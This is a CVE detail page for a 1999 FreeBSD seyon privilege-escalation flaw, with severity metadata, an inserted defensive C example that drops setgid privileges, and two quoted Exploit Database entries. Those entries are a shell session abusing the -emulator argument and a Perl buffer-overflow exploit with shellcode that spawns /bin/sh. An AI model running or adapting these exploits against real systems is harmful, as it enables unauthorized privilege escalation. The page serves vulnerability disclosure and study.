CVE-1999-0821 : Detail

0.04%V3
Local
2000-02-04 04h00 +00:00
2024-08-01 16h48 +00:00

CVE Descriptions

FreeBSD seyon allows local users to gain privileges by providing a malicious program in the -emulator argument.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
| V2 | 4.6 | | AV:L/AC:L/Au:N/C:P/I:P/A:P | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus makes it possible to compare the EPSS score of one CVE with that of others.

Exploit information

Exploit Database EDB-ID : 19651

Publication date : 1999-11-30 23h00 +00:00
Author : Brock Tellier
EDB Verified : Yes

source: https://www.securityfocus.com/bid/838/info

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate privileges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself privileges which allow access to the communications devices or anything else accessible by the group dialer.

One of the methods to exploit seyon is shown below:

    bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
    bash-2.03$ gcc -o id id.c
    bash-2.03$ seyon -emulator ./id
    uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

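
The session above shows the helper inheriting egid=68(dialer) from the setgid binary. The following is an added example, not code from this page and not seyon's or FreeBSD's actual fix, of how a setgid program can launch a user-chosen helper only after the child has permanently given up the extra group; the function names and the `/usr/bin/id` sample helper are assumptions.

```c
#define _XOPEN_SOURCE 700
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop set-group-ID privilege: real, effective and saved GID all
 * become the caller's real GID. Returns 0 on success, -1 on failure. */
int drop_setgid_privilege(void)
{
    gid_t rgid = getgid();
    gid_t old_egid = getegid();

    /* Setting the real GID makes setregid() reset the saved set-group-ID too. */
    if (setregid(rgid, rgid) != 0)
        return -1;
    if (getgid() != rgid || getegid() != rgid)
        return -1;
    /* A non-root process must not be able to switch back to the old group. */
    if (old_egid != rgid && geteuid() != 0 && setegid(old_egid) == 0)
        return -1;
    return 0;
}

/* Hypothetical launcher (name assumed): fork, drop the group in the child,
 * then exec. Returns the helper's exit status (126: drop failed, 127: exec
 * failed) or -1 on fork/wait error. */
int run_helper_unprivileged(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_setgid_privilege() != 0)
            _exit(126);            /* never exec with the extra group */
        execv(path, argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const argv[] = { "id", NULL };   /* constructed sample helper */
    return run_helper_unprivileged("/usr/bin/id", argv);
}
```

Built into a setgid test binary, the helper's `id` output should no longer list an `egid=` different from the caller's own group.
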
Exploit Database EDB-ID : 252

Publication date : 2001-01-14 23h00 +00:00
Author : teleh0r
EDB Verified : Yes

    #!/usr/bin/perl

    ## (c) Copyright [email protected] / anno domani 2000
    ##
    ## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux
    ## Tested on: RedHat 4.0/5.1
    ##
    ## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\
    ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/

    $shellcode =
    "\xeb\x1f".             #/* jmp 0x1f */
    "\x5e".                 #/* popl %esi */
    "\x89\x76\x08".         #/* movl %esi,0x8(%esi) */
    "\x31\xc0".             #/* xorl %eax,%eax */
    "\x88\x46\x07".         #/* movb %eax,0x7(%esi) */
    "\x89\x46\x0c".         #/* movl %eax,0xc(%esi) */
    "\xb0\x0b".             #/* movb $0xb,%al */
    "\x89\xf3".             #/* movl %esi,%ebx */
    "\x8d\x4e\x08".         #/* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c".         #/* leal 0xc(%esi),%edx */
    "\xcd\x80".             #/* int $0x80 */
    "\x31\xdb".             #/* xorl %ebx,%ebx */
    "\x89\xd8".             #/* movl %ebx,%eax */
    "\x40".                 #/* inc %eax */
    "\xcd\x80".             #/* int $0x80 */
    "\xe8\xdc\xff\xff\xff". #/* call -0x24 */
    "/bin/sh";              #/* .string \"/bin/sh\" */

    $ret = 0xbfffef96;
    $egg = 500;
    $len = 208;
    $nop = 'A';

    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    if (!($ENV{'DISPLAY'})) {
        die("Error: the shell variable DISPLAY is not set.\n");
    }

    $buffer .= $nop;
    $new_ret = pack('l',($ret + $offset));

    print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
    sleep(1);

    for ($i = 0; $i < $len; $i += 4) {
        $buffer .= pack('l',($ret + $offset));
    }

    for ($i = 0; $i < ($egg - length($shellcode)); $i++) {
        $buffer .= $nop;
    }

    $buffer .= $shellcode;

    # seyon uses X, so if there is no X server running, or you
    # are not allowed to connect to it, start X on your machine,
    # and using xhost, allow the target to connect to your server,
    # then: export DISPLAY=your-ip:0.0 - and execute the exploit.

    exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");

    # milw0rm.com [2001-01-15]

Products Mentioned

Configuration 0

Freebsd >> Freebsd >> Version 3.3

References

http://www.securityfocus.com/bid/838
Tags : vdb-entry, x_refsource_BID